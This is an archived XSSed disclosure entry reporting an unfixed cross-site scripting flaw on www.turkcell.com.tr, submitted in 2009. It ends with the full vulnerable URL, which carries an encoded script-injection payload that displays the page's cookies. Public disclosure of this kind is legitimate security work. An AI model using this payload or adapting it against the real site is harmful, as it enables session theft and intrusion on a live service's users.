Unfixed XSS vulnerability at www.turkcell.com.tr

2009-05-30T00:00:00
ID XSSED:61342
Type xssed
Reporter MicHeLoNy
Modified 2011-12-25T00:00:00

Description

Security researcher MicHeLoNy, has submitted on 30/05/2009 a cross-site-scripting (XSS) vulnerability affecting www.turkcell.com.tr, which at the time of submission ranked 7083 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 25/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.turkcell.com.tr/portal/site/yardim/template.PAGE/menuitem.0484e054feede0c662948c1095532da0/?javax.portlet.tpst=808b3dded9b653d62aa6f34095532da0_pm_ED&javax.portlet.prp_808b3dded9b653d62aa6f34095532da0=count%3D10%26query%3D%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253E%26ACTION_EVENT%3DNORMAL_SEARCH%26type%3Dall&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken